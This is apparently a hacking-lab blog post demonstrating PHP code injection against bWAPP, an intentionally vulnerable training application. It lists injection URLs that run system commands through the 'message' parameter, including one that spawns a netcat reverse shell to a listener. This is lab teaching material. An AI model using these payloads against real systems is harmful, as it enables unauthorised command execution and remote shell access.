Ethical Hacking Playground

hacking is curiosity

PHP Code Injection

Commands

Listen for a connection


nc -lvp 4444

list the files


http://192.168.20.131/bWAPP/phpi.php?message=system('ls')

view the hostname


http://192.168.20.131/bWAPP/phpi.php?message=system('hostname')

Make a connection to the remote host


http://192.168.20.131/bWAPP/phpi.php?message=system('nc -vn 192.168.20.131 4444 -e /bin/bash')

Demonstration

If you have any questions please comment below.

Advertisements

4 min read

Different Approaches For Reconnaissance — Bug Bounty’s

8 months ago krypt0mux

3 min read

Download this tool and you win!!

8 months ago krypt0mux

2 min read

How to earn your first bounty in bug bounty hunting

12 months ago krypt0mux

2 min read

Bug bounty

A cross-platform note-taking & target-tracking app for penetration testers.

1 year ago krypt0mux

%d bloggers like this: